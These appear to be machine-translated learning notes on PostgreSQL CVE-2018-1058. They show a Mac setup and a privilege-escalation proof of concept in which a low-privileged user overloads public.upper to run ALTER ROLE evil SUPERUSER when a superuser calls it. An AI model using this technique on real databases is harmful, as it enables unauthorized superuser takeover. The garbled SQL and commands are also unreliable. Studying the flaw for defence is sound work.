PostgreSQL Remote Code Execution Vulnerability (cve-2018-1058) Learning notes

0. Reference documents and Introduction:

1. The Prophet Community Chybeta the great god--postgresql Remote Code execution Vulnerability Analysis and utilization-"cve-2018-1058"--a article

2, the blog Park Hunchill--mac under the installation and use of PostgreSQL--a paper

First, PostgreSQL environment construction:

Install PostgreSQL on your Mac and start PostgreSQL

1 Install PostgreSQL 2 Brew Services start PostgreSQL

Second, create the User Configuration environment:

1, initialize the database, forget in the installation or initialization, generated super user, my superuser is hostname, here use BOBAC instead

1 Brew Services Stop PostgreSQL 2 initdb/usr/local/var/postgres-E UTF83 Brew Services start PostgreSQL

2. Create a regular user

1 CreateUser evil-p

3. Create a database:

1 createdb Evil-o evil-e utf8-e

Three, the principle analysis Introduction:

The principle of this vulnerability is to overload functions on the public space, adding malicious program code. While waiting for other accounts, especially high-privileged accounts, to invoke this function, malicious code (executed with high privileges) is executed to achieve the purpose of remote malicious code execution.

Iv. examples of processes (reference)

1. Create TABLE and insert data (Evil permission execution):

1 CREATE TABLE  Public  as SELECT ' Evil '::varchar as contents;

2. Define functions (Evil permission execution):

1 CREATE FUNCTION public. Upper (varcharRETURNSTEXT as $$2     ALTER ROLE evil SUPERUSER; 3     SELECT Pg_catalog. Upper ($1); 4 $$ LANGUAGE SQL VOLATILE;

3, the query time using the upper function (Bobac permission to execute)

1 SELECT Upper  from Hehehehe;

The Alter ROLE evil SUPERUSER was executed at this time;

4. Then view the user rights:

1 SELECT  from Pg_roles;

PostgreSQL Remote Code Execution Vulnerability (cve-2018-1058) Learning notes